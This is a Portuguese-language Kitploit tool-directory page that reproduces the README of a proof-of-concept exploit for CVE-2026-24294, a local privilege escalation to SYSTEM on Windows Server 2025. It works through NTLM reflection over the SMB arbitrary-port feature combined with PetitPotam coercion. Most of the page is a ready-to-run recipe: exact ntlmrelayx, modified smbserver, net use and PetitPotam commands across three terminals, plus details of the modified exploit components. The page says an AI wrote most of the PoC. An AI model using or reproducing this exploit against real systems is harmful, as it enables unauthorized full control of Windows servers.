Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24294 — PoC de escalada de privilégios local para CVE-2026-24294, abusando da porta arbitrária do SMB e da reflexão NTLM para obter SYSTEM no Windows Server 2025. | Kitploit
Ferramentas/GitHubGitHub/0xndi/cve-2026-24294
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoMovimento LateralTestes de PenetraçãoRed Teaming
GitHub0xndi/cve-2026-24294

CVE-2026-24294

PoC de escalada de privilégios local para CVE-2026-24294, abusando da porta arbitrária do SMB e da reflexão NTLM para obter SYSTEM no Windows Server 2025.

Ver Repositório
536há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24294 - Escalada Local de Privilégios por Reflexão NTLM via Porta Arbitrária SMB

Escalada local de privilégios no Windows Server 2025 via reflexão NTLM, abusando do recurso de porta arbitrária SMB introduzido no Windows 11 24H2 / Server 2025.

Vulnerabilidade

O Windows 11 24H2 / Server 2025 introduziu um recurso no cliente SMB que permite conexões em portas TCP arbitrárias (net use \\host\share /tcpport:PORT). Combinado com o multiplexação de sessão SMB (MS-SMB2 Seção 3.2.4.2), isso possibilita a reflexão NTLM local — um usuário de baixo privilégio pode coagir um serviço privilegiado (LSASS) a autenticar em um servidor SMB controlado pelo atacante em uma porta não padrão e, em seguida, retransmitir a autenticação NTLM capturada de volta ao serviço SMB real na porta 445.

Impacto: NT AUTHORITY\SYSTEM a partir de qualquer usuário local.

Afetados: Windows Server 2025 (configuração padrão). O Windows 11 24H2 impõe assinatura SMB, bloqueando a retransmissão.

Fluxo do Ataque

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► Cliente SMB ──TCP:12345──► smbserver.py (nosso)
                                                   │
                                                   ▼ retransmite blob NTLM
 Serviço SMB (:445) ◄────────────────── ntlmrelayx.py
 ← sessão SYSTEM
  1. net use abre uma conexão TCP para nosso servidor SMB em uma porta personalizada
  2. PetitPotam coage o LSASS a autenticar em \\127.0.0.1\share
  3. O cliente SMB reutiliza a conexão TCP existente (multiplexação de sessão)
  4. Nosso smbserver captura o blob NTLM privilegiado e o retransmite via ntlmrelayx
  5. ntlmrelayx autentica no serviço SMB real na porta 445 como SYSTEM

Requisitos

  • Alvo Windows Server 2025
  • Python 3 com Impacket
  • PetitPotam.exe (compilar a partir do código-fonte com Visual Studio, ver PetitPotam/)

Uso

Abra 3 terminais.

Terminal 1 — Inicie o ntlmrelayx (escuta na porta RAW 6666, retransmite para SMB localhost):

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

Terminal 2 — Inicie o smbserver modificado (escuta na porta 12345, retransmite NTLM para a porta 6666):

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

Terminal 3 — Execute o exploit:

root@kitploit:~
:: Monta o compartilhamento em porta personalizada (abre conexão TCP persistente)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: Coage o LSASS a autenticar em nosso servidor SMB
PetitPotam.exe 127.0.0.1 localhost 2

A saída whoami do ntlmrelayx mostrará NT AUTHORITY\SYSTEM.

Componentes

  • PetitPotam/ — Código-fonte PetitPotam modificado. Duas alterações em relação ao upstream:
    • UUID: df1941c5-fe89-4e79-bf10-463657acf44d (interface EFSRPC do WS2025)
    • Pipe nomeado: \pipe\efsrpc
    • Usa a API #2 (EfsRpcEncryptFileSrv), nome do compartilhamento codificado como test
  • smbserver.py — smbserver do impacket modificado com o sinalizador -relay-port. Intercepta SMB2 SESSION_SETUP para capturar uma segunda autenticação NTLM em uma conexão multiplexada e retransmiti-la para um servidor de retransmissão RAW (ntlmrelayx --raw-port).

Créditos

Este PoC foi majoritariamente escrito por IA (GLM 5.1) com base na pesquisa e nas técnicas descritas em:

  • Bypassing Windows Authentication Reflection Mitigations for System Shells — Guillaume André, Synacktiv

Referências

  • CVE-2026-24294 — Microsoft Security Response Center
  • PetitPotam — Gilles Lionel
  • Impacket — Fortra
Baixar ferramenta